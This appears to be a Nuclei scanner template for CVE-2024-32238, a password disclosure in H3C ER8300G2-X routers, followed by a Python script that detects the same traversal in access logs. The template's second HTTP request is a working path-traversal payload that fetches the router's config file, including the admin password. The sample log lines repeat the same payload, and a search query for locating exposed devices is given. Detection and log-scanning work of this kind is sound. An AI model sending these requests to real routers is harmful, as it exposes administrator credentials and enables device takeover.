Vulnerability description
H3C ER8300G2-X is vulnerable to Incorrect Access Control. The password for the router's management system can be accessed via the management system page login interface.
id: CVE-2024-32238

info:
  name: H3C ER8300G2-X - Password Disclosure
  author: s4e-io,adeljck
  severity: critical
  description: |
    H3C ER8300G2-X is vulnerable to Incorrect Access Control. The password for the router's management system can be accessed via the management system page login interface.
  reference:
    - https://github.com/wy876/POC/blob/main/H3C/H3C%E8%B7%AF%E7%94%B1%E5%99%A8userLogin.asp%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md
    - https://github.com/asdfjkl11/CVE-2024-32238/issues/1
    - https://www.h3c.com/cn/Products_And_Solution/InterConnect/Products/Routers/Products/Enterprise/ER/ER8300G2-X/
    - https://github.com/20142995/nuclei-templates
    - https://github.com/FuBoLuSec/CVE-2024-32238
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-32238
    cwe-id: CWE-522
    epss-score: 0.90699
    epss-percentile: 0.99602
  metadata:
    verified: true
    max-request: 2
    fofa-query: body="icg_helpScript.js"
  tags: cve,cve2024,h3c,router,info-leak,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /userLogin.asp HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: module_name
        part: body
        internal: true
        group: 1
        regex:
          - "<title>([A-Za-z0-9-]+)系统管理</title>"

  - raw:
      - |
        GET /userLogin.asp/../actionpolicy_status/../{{module_name}}.cfg HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - 'contains(content_type, "application/x-unknown")'
          - 'contains_all(body, "admpwd=", "auxauthmode=")'
          - 'contains(server, "H3C-Miniware")'
        condition: and
# digest: 4a0a00473045022100940343f461c6cd4649faed3128613964aadaa35c5f48bd04d11b1b1cb6e65c8e0220620b7f1de3889fe3f2eba27b9761a2483421fdaccde42a9364cf9b1b56b710b9:922c64590222798bb761d5b6d8e72950
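As an added defensive example (not part of the template or the referenced PoC), the following Python script scans web-server access logs for the request shape the template's second step uses: a path that walks through `..` segments to reach a `.cfg` file, including URL-encoded variants. The log lines, client IPs and timestamps are constructed for the demo.

```python
import re
from posixpath import normpath
from urllib.parse import unquote

# Constructed sample access-log lines (common log format); the second and
# third requests mirror the traversal path from the template above, the
# third one with the "../" segments URL-encoded as "..%2f".
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2025:10:00:00 +0000] "GET /userLogin.asp HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2025:10:00:01 +0000] "GET /userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg HTTP/1.1" 200 2048
10.0.0.6 - - [01/Jan/2025:10:00:02 +0000] "GET /userLogin.asp/..%2factionpolicy_status/..%2fER8300G2-X.cfg HTTP/1.1" 200 2048
10.0.0.7 - - [01/Jan/2025:10:00:03 +0000] "GET /images/logo.png HTTP/1.1" 200 900
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)


def decode_path(path: str) -> str:
    """URL-decode twice (catches double encoding) and drop any query string."""
    return unquote(unquote(path)).split("?", 1)[0]


def is_cfg_traversal(path: str) -> bool:
    """True when the request path uses '..' segments and resolves to a .cfg file."""
    decoded = decode_path(path)
    has_dotdot = ".." in decoded.split("/")
    return has_dotdot and normpath(decoded).lower().endswith(".cfg")


def find_config_disclosure(log_text: str) -> list:
    """Return one dict per log line that looks like a config-file traversal read."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_cfg_traversal(m["path"]):
            hits.append({
                "ip": m["ip"],
                "status": int(m["status"]),
                "path": m["path"],
                "resolved": normpath(decode_path(m["path"])),
            })
    return hits


if __name__ == "__main__":
    for hit in find_config_disclosure(SAMPLE_LOG):
        print(f"{hit['ip']} -> {hit['resolved']} (HTTP {hit['status']}) via {hit['path']}")
```

A 200 response on such a hit means the device served the file; a 404 or 403 still records the attempt and is worth alerting on.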